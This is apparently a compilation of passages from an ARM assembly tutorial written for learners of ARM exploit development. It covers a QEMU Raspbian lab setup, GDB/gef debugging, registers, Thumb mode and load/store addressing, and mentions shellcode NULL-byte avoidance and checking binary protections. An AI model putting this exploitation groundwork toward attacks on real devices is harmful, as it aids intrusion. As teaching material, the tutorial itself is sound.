0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rwx [stack]
0xffff0000 0xffff1000 0x00000000 r-x [vectors]
gef> xinfo 0xbefff7e8
----------------------------------------[ xinfo: 0xbefff7e8 ]----------------------------------------
Found 0xbefff7e8
Page: 0xbefdf000 -> 0xbf000000 (size=0x21000)
Permissions: rwx
Pathname: [stack]
Offset (from page): +0x207e8
Inode: 0
gef> checksec
[+] checksec for '/home/pi/lab/max'
Canary:                  No
NX Support:              Yes
PIE Support:             No
RPATH:                   No
RUNPATH:                 No
Partial RelRO:           No
Full RelRO:              No
TROUBLESHOOTING

To make debugging with GDB more efficient it is useful to know where certain branches/jumps will take us. Certain (newer) versions of GDB resolve the addresses of a branch instruction and show us the name of the target function. For example, the following output of GDB lacks this feature:

...
0x000104f8 <+72>: bl 0x10334
0x000104fc <+76>: mov r0, #8
0x00010500 <+80>: bl 0x1034c
0x00010504 <+84>: mov r3, r0
...

And this is the output of GDB (native, without gef) which has the feature I’m talking about:

0x000104f8 <+72>:    bl      0x10334 <free@plt>
0x000104fc <+76>:    mov     r0, #8
0x00010500 <+80>:    bl      0x1034c <malloc@plt>
0x00010504 <+84>:    mov     r3, r0

If you don’t have this feature in your GDB, you can either update the Linux sources (and hope that they already have a newer GDB in their repositories) or compile a newer GDB by yourself. If you choose to compile the GDB by yourself, you can use the following commands:

cd /tmp
wget https://ftp.gnu.org/gnu/gdb/gdb-7.12.tar.gz
tar vxzf gdb-7.12.tar.gz
sudo apt-get update
sudo apt-get install libreadline-dev python-dev texinfo -y
cd gdb-7.12
./configure --prefix=/usr --with-system-readline --with-python && make -j4
sudo make -j4 -C gdb/ install
gdb --version

I used the commands provided above to download, compile and run GDB on Raspbian (jessie) without problems. these commands will also replace the previous version of your GDB. If you don’t want that, then skip the command which ends with the word install. Moreover, I did this while emulating Raspbian in QEMU, so it took me a long time (hours), because of the limited resources (CPU) on the emulated environment. I used GDB version 7.12, but you would most likely succeed even with a newer version (click HERE for other versions).

RASPBERRY PI ON QEMU

RASPBERRY PI ON QEMU

Let’s start setting up a Lab VM. We will use Ubuntu and emulate our desired ARM versions inside of it.

First, get the latest Ubuntu version and run it in a VM:

For the QEMU emulation you will need the following:

  1. A Raspbian Image: http://downloads.raspberrypi.org/raspbian/images/raspbian-2017-04-10/ (other versions might work, but Jessie is recommended)
  2. Latest qemu kernel: https://github.com/dhruvvyas90/qemu-rpi-kernel

Inside your Ubuntu VM, create a new folder:

$ mkdir ~/qemu_vms/

Download and place the Raspbian Jessie image to ~/qemu_vms/.

Download and place the qemu-kernel to ~/qemu_vms/.

$ sudo apt-get install qemu-system
$ unzip <image-file>.zip
$ fdisk -l <image-file>

You should see something like this:

Disk 2017-03-02-raspbian-jessie.img: 4.1 GiB, 4393533440 bytes, 8581120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x432b3940

Device                          Boot  Start     End Sectors Size Id Type
2017-03-02-raspbian-jessie.img1        8192  137215  129024  63M  c W95 FAT32 (LBA)
2017-03-02-raspbian-jessie.img2      137216 8581119 8443904   4G 83 Linux

You see that the filesystem (.img2) starts at sector 137216. Now take that value and multiply it by 512, in this case it’s 512 * 137216 = 70254592 bytes. Use this value as an offset in the following command:

$ sudo mkdir /mnt/raspbian
$ sudo mount -v -o offset=70254592 -t ext4 ~/qemu_vms/<your-img-file.img> /mnt/raspbian
$ sudo nano /mnt/raspbian/etc/ld.so.preload

Comment out every entry in that file with ‘#’, save and exit with Ctrl-x » Y.

$ sudo nano /mnt/raspbian/etc/fstab

IF you see anything with mmcblk0 in fstab, then:

  1. Replace the first entry containing /dev/mmcblk0p1 with /dev/sda1
  2. Replace the second entry containing /dev/mmcblk0p2 with /dev/sda2, save and exit.
$ cd ~
$ sudo umount /mnt/raspbian

Now you can emulate it on Qemu by using the following command:

$ qemu-system-arm -kernel ~/qemu_vms/<your-kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-jessie-image.img> -redir tcp:5022::22 -no-reboot

If you see GUI of the Raspbian OS, you need to get into the terminal. Use Win key to get the menu, then navigate with arrow keys until you find Terminal application as shown below.

From the terminal, you need to start the SSH service so that you can access it from your host system (the one from which you launched the qemu).

Now you can SSH into it from your host system with (default password – raspberry):

$ ssh pi@127.0.0.1 -p 5022

For a more advanced network setup see the “Advanced Networking” paragraph below.

Troubleshooting

If SSH doesn’t start in your emulator at startup by default, you can change that inside your Pi terminal with:

$ sudo update-rc.d ssh enable

If your emulated Pi starts the GUI and you want to make it start in console mode at startup, use the following command inside your Pi terminal:

$ sudo raspi-config
>Select 3 – Boot Options
>Select B1 – Desktop / CLI
>Select B2 – Console Autologin

If your mouse doesn’t move in the emulated Pi, click <Windows>, arrow down to Accessories, arrow right, arrow down to Terminal, enter.

Resizing the Raspbian image

Once you are done with the setup, you are left with a total of 3,9GB on your image, which is full. To enlarge your Raspbian image, follow these steps on your Ubuntu machine:

Create a copy of your existing image:

$ cp <your-raspbian-jessie>.img rasbian.img

Run this command to resize your copy:

$ qemu-img resize raspbian.img +6G

Now start the original raspbian with enlarged image as second hard drive:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-original-raspbian-jessie>.img -redir tcp:5022::22 -no-reboot -hdb raspbian.img

Login and run:

$ sudo cfdisk /dev/sdb

Delete the second partition (sdb2) and create a New partition with all available space. Once new partition is creates, use Write to commit the changes. Then Quit the cfdisk.

Resize and check the old partition and shutdown.

$ sudo resize2fs /dev/sdb2
$ sudo fsck -f /dev/sdb2
$ sudo halt

Now you can start QEMU with your enlarged image:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/raspbian.img -redir tcp:5022::22

Advanced Networking

In some cases you might want to access all the ports of the VM you are running in QEMU. For example, you run some binary which opens some network port(s) that you want to access/fuzz from your host (Ubuntu) system. For this purpose, we can create a shared network interface (tap0) which allows us to access all open ports (if those ports are not bound to 127.0.0.1). Thanks to @0xMitsurugi for suggesting this to include in this tutorial.

This can be done with the following commands on your HOST (Ubuntu) system:

azeria@labs:~ $ sudo apt-get install uml-utilities
azeria@labs:~ $ sudo tunctl -t tap0 -u azeria
azeria@labs:~ $ sudo ifconfig tap0 172.16.0.1/24

After these commands you should see the tap0 interface in the ifconfig output.

azeria@labs:~ $ ifconfig tap0
tap0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.16.0.1 netmask 255.255.255.0 broadcast 172.16.0.255
ether 22:a8:a9:d3:95:f1 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

You can now start your QEMU VM with this command:

azeria@labs:~ $ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/rasbian.img -net nic -net tap,ifname=tap0,script=no,downscript=no -no-reboot

When the QEMU VM starts, you need to assign an IP to it’s eth0 interface with the following command:

pi@labs:~ $ sudo ifconfig eth0 172.16.0.2/24

If everything went well, you should be able to reach open ports on the GUEST (Raspbian) from your HOST (Ubuntu) system. You can test this with a netcat (nc) tool (see an example below).

ARM ASSEMBLY BASICS

Why ARM?

This tutorial is generally for people who want to learn the basics of ARM assembly. Especially for those of you who are interested in exploit writing on the ARM platform. You might have already noticed that ARM processors are everywhere around you. When I look around me, I can count far more devices that feature an ARM processor in my house than Intel processors. This includes phones, routers, and not to forget the IoT devices that seem to explode in sales these days. That said, the ARM processor has become one of the most widespread CPU cores in the world. Which brings us to the fact that like PCs, IoT devices are susceptible to improper input validation abuse such as buffer overflows. Given the widespread usage of ARM based devices and the potential for misuse, attacks on these devices have become much more common.

Yet, we have more experts specialized in x86 security research than we have for ARM, although ARM assembly language is perhaps the easiest assembly language in widespread use. So, why aren’t more people focusing on ARM? Perhaps because there are more learning resources out there covering exploitation on Intel than there are for ARM. Just think about the great tutorials on Intel x86 Exploit writing by Fuzzy Security or the Corelan Team – Guidelines like these help people interested in this specific area to get practical knowledge and the inspiration to learn beyond what is covered in those tutorials. If you are interested in x86 exploit writing, the Corelan and Fuzzysec tutorials are your perfect starting point. In this tutorial series here, we will focus on assembly basics and exploit writing on ARM.

ARM PROCESSOR VS. INTEL PROCESSOR

There are many differences between Intel and ARM, but the main difference is the instruction set. Intel is a CISC (Complex Instruction Set Computing) processor that has a larger and more feature-rich instruction set and allows many complex instructions to access memory. It therefore has more operations, addressing modes, but less registers than ARM. CISC processors are mainly used in normal PC’s, Workstations, and servers.

ARM is a RISC (Reduced instruction set Computing) processor and therefore has a simplified instruction set (100 instructions or less) and more general purpose registers than CISC. Unlike Intel, ARM uses instructions that operate only on registers and uses a Load/Store memory model for memory access, which means that only Load/Store instructions can access memory. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

The reduced instruction set has its advantages and disadvantages. One of the advantages is that instructions can be executed more quickly, potentially allowing for greater speed (RISC systems shorten execution time by reducing the clock cycles per instruction). The downside is that less instructions means a greater emphasis on the efficient writing of software with the limited instructions that are available. Also important to note is that ARM has two modes, ARM mode and Thumb mode.

More differences between ARM and x86 are:

  • In ARM, most instructions can be used for conditional execution.
  • The Intel x86 and x86-64 series of processors use the little-endian format
  • The ARM architecture was little-endian before version 3. Since then ARM processors became BI-endian and feature a setting which allows for switchable endianness.

There are not only differences between Intel and ARM, but also between different ARM version themselves. This tutorial series is intended to keep it as generic as possible so that you get a general understanding about how ARM works. Once you understand the fundamentals, it’s easy to learn the nuances for your chosen target ARM version. The examples in this tutorial were created on an 32-bit ARMv6 (Raspberry Pi 1), therefore the explanations are related to this exact version.

The naming of the different ARM versions might also be confusing:

ARM family ARM architecture
ARM7 ARM v4
ARM9 ARM v5
ARM11 ARM v6
Cortex-A ARM v7-A
Cortex-R ARM v7-R
Cortex-M ARM v7-M
WRITING ASSEMBLY

Before we can start diving into ARM exploit development we first need to understand the basics of Assembly language programming, which requires a little background knowledge before you can start to appreciate it. But why do we even need ARM Assembly, isn’t it enough to write our exploits in a “normal” programming / scripting language? It is not, if we want to be able to do Reverse Engineering and understand the program flow of ARM binaries, build our own ARM shellcode, craft ARM ROP chains, and debug ARM applications.

You don’t need to know every little detail of the Assembly language to be able to do Reverse Engineering and exploit development, yet some of it is required for understanding the bigger picture. The fundamentals will be covered in this tutorial series. If you want to learn more you can visit the links listed at the end of this chapter.

So what exactly is Assembly language? Assembly language is just a thin syntax layer on top of the machine code which is composed of instructions, that are encoded in binary representations (machine code), which is what our computer understands. So why don’t we just write machine code instead? Well, that would be a pain in the ass. For this reason, we will write assembly, ARM assembly, which is much easier for humans to understand. Our computer can’t run assembly code itself, because it needs machine code. The tool we will use to assemble the assembly code into machine code is a GNU Assembler from the GNU Binutils project named as which works with source files having the *.s extension.

Once you wrote your assembly file with the extension *.s, you need to assemble it with as and link it with ld:

$ as program.s -o program.o
$ ld program.o -o program

ASSEMBLY UNDER THE HOOD

Let’s start at the very bottom and work our way up to the assembly language. At the lowest level, we have our electrical signals on our circuit. Signals are formed by switching the electrical voltage to one of two levels, say 0 volts (‘off’) or 5 volts (‘on’). Because just by looking we can’t easily tell what voltage the circuit is at, we choose to write patterns of on/off voltages using visual representations, the digits 0 and 1, to not only represent the idea of an absence or presence of a signal, but also because 0 and 1 are digits of the binary system. We then group the sequence of 0 and 1 to form a machine code instruction which is the smallest working unit of a computer processor. Here is an example of a machine language instruction:

1110 0001 1010 0000 0010 0000 0000 0001

So far so good, but we can’t remember what each of these patterns (of 0 and 1) mean.  For this reason, we use so called mnemonics, abbreviations to help us remember these binary patterns, where each machine code instruction is given a name. These mnemonics often consist of three letters, but this is not obligatory. We can write a program using these mnemonics as instructions. This program is called an Assembly language program, and the set of mnemonics that is used to represent a computer’s machine code is called the Assembly language of that computer. Therefore, Assembly language is the lowest level used by humans to program a computer. The operands of an instruction come after the mnemonic(s). Here is an example:

MOV R2, R1

Now that we know that an assembly program is made up of textual information called mnemonics, we need to get it converted into machine code. As mentioned above, in the case of ARM assembly, the GNU Binutils project supplies us with a tool called as. The process of using an assembler like as to convert from (ARM) assembly language to (ARM) machine code is called assembling.

In summary, we learned that computers understand (respond to) the presence or absence of voltages (signals) and that we can represent multiple signals in a sequence of 0s and 1s (bits). We can use machine code (sequences of signals) to cause the computer to respond in some well-defined way. Because we can’t remember what all these sequences mean, we give them abbreviations – mnemonics, and use them to represent instructions. This set of mnemonics is the Assembly language of the computer and we use a program called Assembler to convert code from mnemonic representation to the computer-readable machine code, in the same way a compiler does for high-level languages.

DATA TYPES

This is part two of the ARM Assembly Basics tutorial series, covering data types and registers.

Similar to high level languages, ARM supports operations on different datatypes.
The data types we can load (or store) can be signed and unsigned words, halfwords, or bytes. The extensions for these data types are: -h or -sh for halfwords, -b or -sb for bytes, and no extension for words. The difference between signed and unsigned data types is:

  • Signed data types can hold both positive and negative values and are therefore lower in range.
  • Unsigned data types can hold large positive values (including ‘Zero’) but cannot hold negative values and are therefore wider in range.

Here are some examples of how these data types can be used with the instructions Load and Store:

ldr = Load Word
ldrh = Load unsigned Half Word
ldrsh = Load signed Half Word
ldrb = Load unsigned Byte
ldrsb = Load signed Bytes

str = Store Word
strh = Store unsigned Half Word
strsh = Store signed Half Word
strb = Store unsigned Byte
strsb = Store signed Byte
ENDIANNESS

There are two basic ways of viewing bytes in memory: Little-Endian (LE) or Big-Endian (BE). The difference is the byte-order in which each byte of an object is stored in memory. On little-endian machines like Intel x86, the least-significant-byte is stored at the lowest address (the address closest to zero). On big-endian machines the most-significant-byte is stored at the lowest address. The ARM architecture was little-endian before version 3, since then it is bi-endian, which means that it features a setting which allows for switchable endianness. On ARMv6 for example, instructions are fixed little-endian and data accesses can be either little-endian or big-endian as controlled by bit 9, the E bit, of the Program Status Register (CPSR).

ARM REGISTERS

The amount of registers depends on the ARM version. According to the ARM Reference Manual, there are 30 general-purpose 32-bit registers, with the exception of ARMv6-M and ARMv7-M based processors. The first 16 registers are accessible in user-level mode, the additional registers are available in privileged software execution (with the exception of ARMv6-M and ARMv7-M). In this tutorial series we will work with the registers that are accessible in any privilege mode: r0-15. These 16 registers can be split into two groups: general purpose and special purpose registers.

The following table is just a quick glimpse into how the ARM registers could relate to those in Intel processors.

R0-R12: can be used during common operations to store temporary values, pointers (locations to memory), etc. R0, for example, can be referred as accumulator during the arithmetic operations or for storing the result of a previously called function. R7 becomes useful while working with syscalls as it stores the syscall number and R11 helps us to keep track of boundaries on the stack serving as the frame pointer (will be covered later). Moreover, the function calling convention on ARM specifies that the first four arguments of a function are stored in the registers r0-r3.

R13: SP (Stack Pointer). The Stack Pointer points to the top of the stack. The stack is an area of memory used for function-specific storage, which is reclaimed when the function returns. The stack pointer is therefore used for allocating space on the stack, by subtracting the value (in bytes) we want to allocate from the stack pointer. In other words, if we want to allocate a 32 bit value, we subtract 4 from the stack pointer.

R14: LR (Link Register). When a function call is made, the Link Register gets updated with a memory address referencing the next instruction where the function was initiated from. Doing this allows the program return to the “parent” function that initiated the “child” function call after the “child” function is finished.

R15: PC (Program Counter). The Program Counter is automatically incremented by the size of the instruction executed. This size is always 4 bytes in ARM state and 2 bytes in THUMB mode. When a branch instruction is being executed, the PC holds the destination address. During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb(v1) state. This is different from x86 where PC always points to the next instruction to be executed.

Let’s look at how PC behaves in a debugger. We use the following program to store the address of pc into r0 and include two random instructions. Let’s see what happens.

.section .text
.global _start

_start:
 mov r0, pc
 mov r1, #2
 add r2, r1, r1
 bkpt

In GDB we set a breakpoint at _start and run it:

gef> br _start
Breakpoint 1 at 0x8054
gef> run

Here is a screenshot of the output we see first:

$r0 0x00000000   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008054 
$cpsr 0x00000010 

0x8054 <_start> mov r0, pc     <- $pc
0x8058 <_start+4> mov r0, #2
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6

We can see that PC holds the address (0x8054) of the next instruction (mov r0, pc) that will be executed. Now let’s execute the next instruction after which R0 should hold the address of PC (0x8054), right?

$r0 0x0000805c   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008058 
$cpsr 0x00000010

0x8058 <_start+4> mov r0, #2       <- $pc
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6
0x8078 adfcssp f0, f0, #4.0

…right? Wrong. Look at the address in R0. While we expected R0 to contain the previously read PC value (0x8054) it instead holds the value which is two instructions ahead of the PC we previously read (0x805c). From this example you can see that when we directly read PC it follows the definition that PC points to the next instruction; but when debugging, PC points two instructions ahead of the current PC value (0x8054 + 8 = 0x805C). This is because older ARM processors always fetched two instructions ahead of the currently executed instructions. The reason ARM retains this definition is to ensure compatibility with earlier processors.

CURRENT PROGRAM STATUS REGISTER

When you debug an ARM binary with gdb, you see something called Flags:

The register $cpsr shows the value of the Current Program Status Register (CPSR) and under that you can see the Flags thumb, fast, interrupt, overflow, carry, zero, and negative. These flags represent certain bits in the CPSR register and are set according to the value of the CPSR and turn bold when activated. The N, Z, C, and V bits are identical to the SF, ZF, CF, and OF bits in the EFLAG register on x86. These bits are used to support conditional execution in conditionals and loops at the assembly level. We will cover condition codes used in Conditional Execution and Branching.

The picture above shows a layout of a 32-bit register (CPSR) where the left (<-) side holds most-significant-bits and the right (->) side the least-significant-bits. Every single cell (except for the GE and M section along with the blank ones) are of a size of one bit. These one bit sections define various properties of the program’s current state.

Let’s assume we would use the CMP instruction to compare the numbers 1 and 2. The outcome would be ‘negative’ because 1 – 2 = -1. When we compare two equal numbers, like 2 against 2, the Z (zero) flag is set because 2 – 2 = 0. Keep in mind that the registers used with the CMP instruction won’t be modified, only the CPSR will be modified based on the result of comparing these registers against each other.

This is how it looks like in GDB (with GEF installed): In this example we compare the registers r1 and r0, where r1 = 4 and r0 = 2. This is how the flags look like after executing the cmp r1, r0 operation:

The Carry Flag is set because we use cmp r1, r0 to compare 4 against 2 (4 – 2). In contrast, the Negative flag (N) is set if we use cmp r0, r1 to compare a smaller number (2) against a bigger number (4).

Here’s an excerpt from the ARM infocenter:

The APSR contains the following ALU status flags:

N – Set when the result of the operation was Negative.

Z – Set when the result of the operation was Zero.

C – Set when the operation resulted in a Carry.

V – Set when the operation caused oVerflow.

A carry occurs:

  • if the result of an addition is greater than or equal to 232
  • if the result of a subtraction is positive or zero
  • as the result of an inline barrel shifter operation in a move or logical instruction.

Overflow occurs if the result of an add, subtract, or compare is greater than or equal to 231, or less than –231.

ARM & THUMB

ARM processors have two main states they can operate in (let’s not count Jazelle here), ARM and Thumb. These states have nothing to do with privilege levels. For example, code running in SVC mode can be either ARM or Thumb. The main difference between these two states is the instruction set, where instructions in ARM state are always 32-bit, and  instructions in Thumb state are 16-bit (but can be 32-bit). Knowing when and how to use Thumb is especially important for our ARM exploit development purposes. When writing ARM shellcode, we need to get rid of NULL bytes and using 16-bit Thumb instructions instead of 32-bit ARM instructions reduces the chance of having them.

The calling conventions of ARM versions is more than confusing and not all ARM versions support the same Thumb instruction sets. At some point, ARM introduced an enhanced Thumb instruction set (pseudo name: Thumbv2) which allows 32-bit Thumb instructions and even conditional execution, which was not possible in the versions prior to that. In order to use conditional execution in Thumb state, the “it” instruction was introduced. However, this instruction got then removed in a later version and exchanged with something that was supposed to make things less complicated, but achieved the opposite. I don’t know all the different variations of ARM/Thumb instruction sets across all the different ARM versions, and I honestly don’t care. Neither should you. The only thing that you need to know is the ARM version of your target device and its specific Thumb support so that you can adjust your code. The ARM Infocenter should help you figure out the specifics of your ARM version (http://infocenter.arm.com/help/index.jsp).

As mentioned before, there are different Thumb versions. The different naming is just for the sake of differentiating them from each other (the processor itself will always refer to it as Thumb).

  • Thumb-1 (16-bit instructions): was used in ARMv6 and earlier architectures.
  • Thumb-2 (16-bit and 32-bit instructions): extents Thumb-1 by adding more instructions and allowing them to be either 16-bit or 32-bit wide (ARMv6T2, ARMv7).
  • ThumbEE: includes some changes and additions aimed for dynamically generated code (code compiled on the device either shortly before or during execution).

Differences between ARM and Thumb:

  • Conditional execution: All instructions in ARM state support conditional execution. Some ARM processor versions allow conditional execution in Thumb by using the IT instruction. Conditional execution leads to higher code density because it reduces the number of instructions to be executed and reduces the number of expensive branch instructions.
  • 32-bit ARM and Thumb instructions: 32-bit Thumb instructions have a .w suffix.
  • The barrel shifter is another unique ARM mode feature. It can be used to shrink multiple instructions into one. For example, instead of using two instructions for a multiply (multiplying register by 2 and using MOV to store result into another register), you can include the multiply inside a MOV instruction by using shift left by 1 -> Mov  R1, R0, LSL #1      ; R1 = R0 * 2

To switch the state in which the processor executes in, one of two conditions have to be met:

  • We can use the branch instruction BX (branch and exchange) or BLX (branch, link, and exchange) and set the destination register’s least significant bit to 1. This can be achieved by adding 1 to an offset, like 0x5530 + 1. You might think that this would cause alignment issues, since instructions are either 2- or 4-byte aligned. This is not a problem because the processor will ignore the least significant bit.
  • We know that we are in Thumb mode if the T bit in the current program status register is set.
    • We know that we are in Thumb mode if the T bit in the current program status register is set.
    INTRODUCTION TO ARM INSTRUCTIONS

    The purpose of this part is to briefly introduce into the ARM’s instruction set and it’s general use. It is crucial for us to understand how the smallest piece of the Assembly language operates, how they connect to each other, and what can be achieved by combining them.

    As mentioned earlier, Assembly language is composed of instructions which are the main building blocks. ARM instructions are usually followed by one or two operands and generally use the following template:

    MNEMONIC{S}{condition} {Rd}, Operand1, Operand2

    Due to flexibility of the ARM instruction set, not all instructions use all of the fields provided in the template. Nevertheless, the purpose of fields in the template are described as follows:

    MNEMONIC     - Short name (mnemonic) of the instruction
    {S}          - An optional suffix. If S is specified, the condition flags are updated on the result of the operation
    {condition}  - Condition that is needed to be met in order for the instruction to be executed
    {Rd}         - Register (destination) for storing the result of the instruction
    Operand1     - First operand. Either a register or an immediate value 
    Operand2     - Second (flexible) operand. Can be an immediate value (number) or a register with an optional shift

    While the MNEMONIC, S, Rd and Operand1 fields are straight forward, the condition and Operand2 fields require a bit more clarification. The condition field is closely tied to the CPSR register’s value, or to be precise, values of specific bits within the register. Operand2 is called a flexible operand, because we can use it in various forms – as immediate value (with limited set of values), register or register with a shift. For example, we can use these expressions as the Operand2:

    #123                    - Immediate value (with limited set of values). 
    Rx                      - Register x (like R1, R2, R3 ...)
    Rx, ASR n               - Register x with arithmetic shift right by n bits (1 = n = 32)
    Rx, LSL n               - Register x with logical shift left by n bits (0 = n = 31)
    Rx, LSR n               - Register x with logical shift right by n bits (1 = n = 32)
    Rx, ROR n               - Register x with rotate right by n bits (1 = n = 31)
    Rx, RRX                 - Register x with rotate right by one bit, with extend

    As a quick example of how different kind of instructions look like, let’s take a look at the following list.

    ADD   R0, R1, R2         - Adds contents of R1 (Operand1) and R2 (Operand2 in a form of register) and stores the result into R0 (Rd)
    ADD   R0, R1, #2         - Adds contents of R1 (Operand1) and the value 2 (Operand2 in a form of an immediate value) and stores the result into R0 (Rd)
    MOVLE R0, #5             - Moves number 5 (Operand2, because the compiler treats it as MOVLE R0, R0, #5) to R0 (Rd) ONLY if the condition LE (Less Than or Equal) is satisfied
    MOV   R0, R1, LSL #1     - Moves the contents of R1 (Operand2 in a form of register with logical shift left) shifted left by one bit to R0 (Rd). So if R1 had value 2, it gets shifted left by one bit and becomes 4. 4 is then moved to R0.

    As a quick summary, let’s take a look at the most common instructions which we will use in future examples.

    MEMORY INSTRUCTIONS: LOAD AND STORE

    ARM uses a load-store model for memory access which means that only load/store (LDR and STR) instructions can access memory. While on x86 most instructions are allowed to directly operate on data in memory, on ARM data must be moved from memory into registers before being operated on. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment, and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

    To explain the fundamentals of Load and Store operations on ARM, we start with a basic example and continue with three basic offset forms with three different address modes for each offset form. For each example we will use the same piece of assembly code with a different LDR/STR offset form, to keep it simple.

    1. Offset form: Immediate value as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    2. Offset form: Register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    3. Offset form: Scaled register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed

    First basic example

    Generally, LDR is used to load something from memory into a register, and STR is used to store something from a register to a memory address.

    LDR R2, [R0]   @ [R0] - origin address is the value found in R0.
    STR R2, [R1]   @ [R1] - destination address is the value found in R1.

    LDR operation: loads the value at the address found in R0 to the destination register R2.

    STR operation: stores the value found in R2 to the memory address found in R1.

     

    This is how it would look like in a functional assembly program:

    .data          /* the .data section is dynamically created and its addresses cannot be easily predicted */
    var1: .word 3  /* variable 1 in memory */
    var2: .word 4  /* variable 2 in memory */
    
    .text          /* start of the text (code) section */ 
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2  
        str r2, [r1]      @ store the value found in R2 (0x03) to the memory address found in R1 
        bkpt             
    
    adr_var1: .word var1  /* address to var1 stored here */
    adr_var2: .word var2  /* address to var2 stored here */

    At the bottom we have our Literal Pool (a memory area in the same code section to store constants, strings, or offsets that others can reference in a position-independent manner) where we store the memory addresses of var1 and var2 (defined in the data section at the top) using the labels adr_var1 and adr_var2. The first LDR loads the address of var1 into register R0. The second LDR does the same for var2 and loads it to R1. Then we load the value stored at the memory address found in R0 to R2, and store the value found in R2 to the memory address found in R1.

    When we load something into a register, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to load something from.

    When we store something to a memory location, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to store something to.

    This sounds more complicated than it actually is, so here is a visual representation of what’s going on with the memory and the registers when executing the code above in a debugger:

    Let’s look at the same code in a debugger.

    gef> disassemble _start
    Dump of assembler code for function _start:
     0x00008074 <+0>:      ldr  r0, [pc, #12]   ; 0x8088 <adr_var1>
     0x00008078 <+4>:      ldr  r1, [pc, #12]   ; 0x808c <adr_var2>
     0x0000807c <+8>:      ldr  r2, [r0]
     0x00008080 <+12>:     str  r2, [r1]
     0x00008084 <+16>:     bx   lr
    End of assembler dump.

    The labels we specified with the first two LDR operations changed to [pc, #12]. This is called PC-relative addressing. Because we used labels, the compiler calculated the location of our values specified in the Literal Pool (PC+12).  You can either calculate the location yourself using this exact approach, or you can use labels like we did previously. The only difference is that instead of using labels, you need to count the exact position of your value in the Literal Pool. In this case, it is 3 hops (4+4+4=12) away from the effective PC position. More about PC-relative addressing later in this chapter.

    Side note: In case you forgot why the effective PC is located two instructions ahead of the current one, [… During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb state. This is different from x86 where PC always points to the next instruction to be executed…].

    1. Offset form: Immediate value as the offset

    STR    Ra, [Rb, imm]
    LDR    Ra, [Rc, imm]

    Here we use an immediate (integer) as an offset. This value is added or subtracted from the base register (R1 in the example below) to access data at an offset known at compile time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2 
        str r2, [r1, #2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 plus 2. Base register (R1) unmodified. 
        str r2, [r1, #4]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 plus 4. Base register (R1) modified: R1 = R1+4 
        ldr r3, [r1], #4  @ address mode: post-intexed. Load the value at memory address found in R1 to register R3 (not R3 plus 4). Base register (R1) modified: R1 = R1+4 
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    Let’s call this program ldr.s, compile it and run it in GDB to see what happens.

    $ as ldr.s -o ldr.o
    $ ld ldr.o -o ldr
    $ gdb ldr

